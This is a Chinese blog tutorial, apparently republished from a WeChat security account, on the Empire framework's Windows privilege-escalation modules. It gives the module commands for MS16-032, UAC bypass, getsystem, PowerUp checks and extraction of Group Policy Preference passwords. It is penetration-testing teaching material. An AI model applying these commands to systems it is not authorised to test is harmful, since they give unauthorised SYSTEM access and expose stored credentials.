【Empire系列】04 Empire提权模块

admin 2021年12月22日21:24:38评论150 views字数 789阅读2分37秒阅读模式

Empire提权模块本都在usemodule privesc/模块下



一、溢出漏洞模块:

Empire自带了MS16-032、MS16-135(不稳定)

usemodule privesc/ms16-032set Listener <监听器名称>execute

【Empire系列】04 Empire提权模块




二、bypass UAC:

①bypassuac

usemodule privesc/bypassuacset Listener <监听器名称>execute

【Empire系列】04 Empire提权模块

提权成功会返回一个高权限的agents会话



或者直接进入某个agents,执行:

bypassuac <监听器名称>

【Empire系列】04 Empire提权模块


②bypassuac_wscript(只适用于windows7)

usemodule privesc/bypassuac_wscriptset Listener <监听器名称>execute

【Empire系列】04 Empire提权模块

提权成功会返回一个高权限的agents会话



直接执行getsystem就可以提权成功

usemodule privesc/getsystem*

【Empire系列】04 Empire提权模块

可以看到现在的权限已经是system了。




三、Powerup模块:

Empire直接集成了powerup脚本,直接调用相关模块即可

usemodule privesc/powerup/    #tab键列出模块

【Empire系列】04 Empire提权模块


①allchecks

usemodule privesc/powerup/allchecksexecute

【Empire系列】04 Empire提权模块

根据AbuseFunction给出的利用方式进行利用即可,关于powerup在这不过多讲述,参考一下网上师傅们优秀的文章就好。




四、GPP组策略首选项提权模块:

usemodule privesc/gppexecute

【Empire系列】04 Empire提权模块

有组策略的话就会返回xml文件中的账号密码,然后再进行后续利用即可。


    



☆ END ☆

点个赞和在看吧,欢迎转发!

点个赞和在看吧,欢迎转发!

点个赞和在看吧,欢迎转发!

【Empire系列】04 Empire提权模块


本文始发于微信公众号(哈拉少安全小队):【Empire系列】04 Empire提权模块

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月22日21:24:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Empire系列】04 Empire提权模块http://cn-sec.com/archives/459302.html

发表评论

匿名网友 填写信息